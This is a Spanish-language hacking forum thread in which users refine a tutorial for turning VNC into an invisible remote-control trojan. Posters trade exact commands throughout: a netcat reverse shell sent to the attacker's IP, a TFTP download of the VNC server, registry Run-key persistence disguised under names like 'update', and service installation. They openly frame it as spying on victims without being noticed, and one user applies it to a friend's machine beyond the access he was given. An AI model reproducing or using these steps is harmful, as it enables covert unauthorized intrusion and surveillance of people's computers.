Troyanizando VNC - Control Remoto Invisible

Iniciado por Gospel, 22 Septiembre 2004, 10:59 AM

0 Miembros y 2 Visitantes están viendo este tema.

zhyzura

#10
pues me puse a realizar las pruebas para ver si a mi tambien me mandaba los errores (la verdad es que aun no lo habia provado)

Cita de: jomagalo en  2 Octubre 2004, 02:55 AM
pues yo no le veo la opcion de reverse shell al vnc ni con la version 4
lo de la reverse shell, nunca dije que se realizara con el vnc sino con el netcat (fijaos un poco en mi explicacion).

Citarconfiguro el server con el pass
cierro
me bajo vnc-3_3_2r6_x86_win32_notray.zip
remplazo el WinVNC.exe
, pero ahi viene mi consulta, dentro del zip de vnc-3_3_2r6_x86_win32_notray.zip
tambien vienen :
omnithread_rt.dll
VNCHooks.dll
vncviewer.exe

esos tambien los remplazo

basta con que cambies solo el winvnc, como dice Gospel.


Cita de: Sir_Neo en  2 Octubre 2004, 21:25 PM
aki hay algo que esconden. yo tb lo he probado y me sale lo mismo. la password no se keda almacenada. A parte que cuando lo lanzas por consola se abre la ventana de propiedades
pues mas que nada se debe a que el vncviewer que trae el vnc  que nos descargamos no es 100% compatible con el winvnc que nos descargamos para que no nos mostrara el icono  :'(.
pero como en este foro todo tiee solucion, ya encontre una ;D
solo necesitamos descargarnos este vncviewer:

http://www.realvnc.com/dist/vnc-4.0-x86_win32_viewer.exe

ponemos su ip y listo (recuerden desabilitar las opciones de teclado y mouse para que solo lo observemos y no nos cache en la matada xDDD). es de ley que va a funcionar, lo acabo de comprobar y solo me pidio la contraseña que puse.




un punto que se te escapo Gospel, fue de que si la victima reinicia su pc, ya no reiniciara el winvnc y tendriamos que obtener otra vez la shell remota para iniciarlo.

asi de que lo mejor es agregar un valor al registro de esta manera:
en la shell remota tecleamos lo siguiente:

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\vnc\winvnc"

seria asi si nosotros le subimos los archivos en la carpeta vnc que se encuentra en el directorio raiz, si no es asi solo basta con que pongamos la ubicacion del winvnc y listo, ya le tendremos una entrada en registro para que se inicie junto con windows y la victima ni cuenta se de xDDD.

solo me queda recordarles que los archivos WinVNC.exe y VNCHooks.dll tienen que estar en la misma carpeta, y el archivo omnithread_rt.dll localizado en C:\WINDOWS\system32, tiene que estar dentro de system32 en la victima.

saludos y espero haberles aclarado las dudas para que empiecen a jugar por alli  :P

Sir_Neo

Gracias por tu aclaración zhyzura, pero ya se donde estaba el fallo.

Lo unico que falta es añadir a la victima las lineas del registro, no se si todas, por lo menos la del password y la que no muestra la ventana de propiedades.

y sobre esta linea, solo hacerte un comentario:
Citar
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\vnc\winvnc"

Esta linea ya la tienes posteada en otro post para indicar que se inicie el netcat, :P pero con su correspondiente linea de comandos. Se te olvido cambiar el nombre que le asignas al registro NetCat por uno más identificativo al winvnc.  8)

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinVnc /t REG_SZ /d "C:\vnc\winvnc"

Bueno, solo era eso, jeje, gracias de todas maneras por tu aportación, que siempre tas ahi dandome soluciones a mis dudas.

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/

Gospel

Wow... muchas gracias zhyzura!!! Con tus aportaciones, el "tutorial" ya está completo... Hala, a espiar, a espiar!!

Siento haber estado desaparecido esta ultima semana, pero me fui de vacaciones (de verdad q las necesitaba...). A ver si me pongo al día...

Salu2



zhyzura

Gracias por la aclaracion Sir_Neo...le verdad se me habia pasado cambiar ese detalle, aunque para que levante menos sospechas le podemos poner update o winxp, solo para no levantar tantas sospechas  :P

saludos

P.D. esperamos nos hallas traido algo de tus vacaciones Gospel  ::), solo como recuerdito xDDD

Man-In-the-Middle

Buenos puntosss bros, esatamente es lo que dicen

Busca en el registro, winvnc, y cuando encuentres las lineas correspondientes al winvnc, son unas 5 o 6, le das a exportar.

Cuando entres en la victima, subele tambien el reg y lo lanzas tb.

reg import vnc.reg.

***************comentario Sir_nero****************

Muy bueno

pero para ponerlo de servicio



c:\winvnc.exe -install
c:\start winvnc
******************comentario Chico*****************
Ahora si esto rulaaaaaaaaaaaaaaaa  de maravilla, graciass totaless

Man-In-the-Middle

Pd: Pero para que rule la conexion es necesario que la mauina se reinice, si no bota connexion close


Locuras

Hola a todos

tengo un colega, me ha dejado meterme x el escritorio remoto del messenger.
me he metido en su registro y le he puesto una línea netcat

start /B c:\nc.exe -d -e cmd.exe "MI.IP" "MI.PUERTO"

y luego, esta misma línea la activo por cmd en su equipo.
como yo ya estaba a la escucha en mi puerto X, pues tengo su shell, hasta ahi bien ¿no?

Ahora bien... tecleo segun pantallazo de Gospel:

TFTP -i "MI.IP" get c:\winvnc.exe c:\vnc\winvnc.exe

yo tengo este archivos en mi c:\ raíz

y me da error de "tiempo de espera agotado"

mi colega tiene router, y yo tengo activado el firewall de xp

Cuando me da el error, tarda en dármelo, cuando yo desactivo mi firewall, el error aparece al segundo de darle enter, hemos probado a levantar un servicio ambas máquinas que se llama "Servicio de transferencia inteligente en segundo plano" pero nos sigue apareciendo el mismo error




zhyzura

Digamos que no has leido adecuadamente los manuales, ya que claramente especifican que el archivo a subir a la victima tiene que estar en el directorio del TFTP no el directorio raiz.

CitarTFTP -i "MI.IP" get c:\winvnc.exe c:\vnc\winvnc.exe
en la parte que pones c:\winvnc.exe basta con que pongas solo "winvnc.exe", y el destino c:\vnc\winvnc.exe para que funcione, tendra que existir el directorio c:\vnc para que funcione

saludos

Locuras

Wenas noches

Le he dado a boton derecho c:, buscar

he buscado TFTP y me aparece un archivo en el c:\windows\system32\tftp.exe

pero no encuentro una carpeta con nombre TFTP

el manual dice esto sobre TFTP:

4) Subir el Servidor VNC a la víctima.
Después de haber obtenido una shell remota de la víctima, vamos a subir vía TFTP los archivos necesarios para poder ejecutar el Servidor VNC en el sistema de la víctima.
Para ello, colocamos en la carpeta de nuestro Servidor TFTP (si no entiendes esto de Servidor TFTP, busca por el foro...) los siguientes archivos:

yo he buscado por el foro cosas de TFTP y no leí nada referente a mi servidor TFTP  :o

deduzco que por lo que me dices, me falta algo...  ::)

¿me falta por instalar algún programa entonces? ¿o he de crearme yo la carpeta en algun lado?  ???

zhyzura

Citar¿me falta por instalar algún programa entonces?

si

para poder subir archivos via TFTP, el atacante debera de poner el archivo a subir a la victima dentro del directorio del servidor TFTP, por lo tanto deberas de instalarte un servidor TFTP en tu maquina, dicho servirdor lo puedes encontrar en la web de tu preferencia  ::) www.elhacker.net en la sección de hacking.

saludos y suerte

Sir_Neo

#19
no estoy muy seguro, pero creo que en el manual de gospel no dice que tienes que tener instalado el server del TFTP, pq a mi me paso lo mismo, y estuve probando una y otra vez, hasta que me dijeron que necesitaba el server.

Bueno si lo nombra, pero dice que busques por el foro. bueno ahi te dejo algunos comentarios.

Te bajas el server q es solo un ejecutable, lo lanzas, y se te abre una ventanita. Entonces, es cuando ejecutas la linea q tu ya sabes, y mientras q sube el fichero, en la ventanita del server sale informacion del fichero (ya lo veras).

Como te ha dicho zhyzura, metes los ficheros que quieras subir en la misma carpeta que tienes puesto el server TFTP.

prueba y nos cuentas.

Un Saludo

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/